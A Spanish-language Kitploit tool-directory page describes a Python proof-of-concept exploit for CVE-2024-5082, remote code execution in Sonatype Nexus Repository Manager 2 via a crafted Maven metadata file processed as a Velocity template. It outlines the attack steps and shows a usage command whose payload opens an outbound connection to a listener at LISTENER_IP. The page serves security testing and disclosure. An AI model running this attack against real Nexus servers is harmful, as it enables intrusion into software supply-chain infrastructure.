Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-5082 — Exploit de prueba de concepto para CVE-2024-5082, una vulnerabilidad de ejecución remota de código en Sonatype Nexus Repository Manager 2 mediante artefactos Maven manipulados y procesamiento de plantillas Velocity. | Kitploit
Herramientas/GitHubGitHub/h4mr3r/cve-2024-5082
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Cadena de SuministroDesarrollo de Payloads
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Exploit de prueba de concepto para CVE-2024-5082, una vulnerabilidad de ejecución remota de código en Sonatype Nexus Repository Manager 2 mediante artefactos Maven manipulados y procesamiento de plantillas Velocity.

Ver Repositorio
12hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción general

Este repositorio contiene una prueba de concepto en Python para CVE-2024-5082, una vulnerabilidad de ejecución remota de código en Sonatype Nexus Repository Manager 2.

La vulnerabilidad permite que un usuario con permisos suficientes publique un artefacto Maven especialmente diseñado y lo marque para que sea procesado por el generador de contenido Velocity. Cuando se recupera el artefacto, Nexus evalúa la plantilla Velocity incrustada y puede ejecutar un comando en el contexto de seguridad de la JVM de Nexus.

Según Sonatype:

  • las versiones afectadas incluyen Nexus Repository Manager 2.x hasta 2.15.1 inclusive;
  • el problema se corrigió en 2.15.2;
  • Nexus Repository 2 llegó al final de su vida útil el 30 de junio de 2025 y debe migrarse a Nexus Repository 3.

Aclaración importante sobre el alcance

El comando se ejecuta en el host de Nexus Repository.

Descargar el artefacto afectado desde un servidor de compilación, un servidor de aplicaciones o una estación de trabajo de desarrollo no ejecuta por sí solo el comando incrustado en ese sistema consumidor. Sin embargo, el compromiso de un administrador de repositorios puede crear un riesgo más amplio en la cadena de suministro si un atacante modifica posteriormente artefactos de confianza, entradas de compilación, credenciales o la configuración del repositorio.

Cómo funciona el PoC

El script:

  1. Genera una ruta de marcador única bajo un espacio de nombres de estilo Maven.
  2. Sube un archivo maven-metadata.xml manipulado a un repositorio alojado seleccionado.
  • Actualiza los atributos correspondientes de Nexus para que el generador de contenido se establezca en velocity.
  • Recupera el artefacto subido, lo que hace que Nexus procese la plantilla.
  • Intenta eliminar el artefacto marcador subido durante la limpieza.
  • La carga útil suministrada crea una conexión TCP saliente desde el host de Nexus hasta la dirección del listener configurada.

    Autenticación y permisos

    El script actual utiliza autenticación básica HTTP y requiere:

    • un nombre de usuario y una contraseña válidos de Nexus;
    • permiso para crear o actualizar contenido en el repositorio seleccionado;
    • permiso para la actualización de atributos utilizada por el PoC.

    Uso

    root@kitploit:~
    python3 cve_2024_5082.py \\
      --base-url https://nexus.example.test/nexus \\
      --repository security-test-snapshots \\
      --username test-user \\
      --password 'REDACTED' \\
      --lhost LISTENER_IP \\
      --lport 8000
    
    Descargar herramienta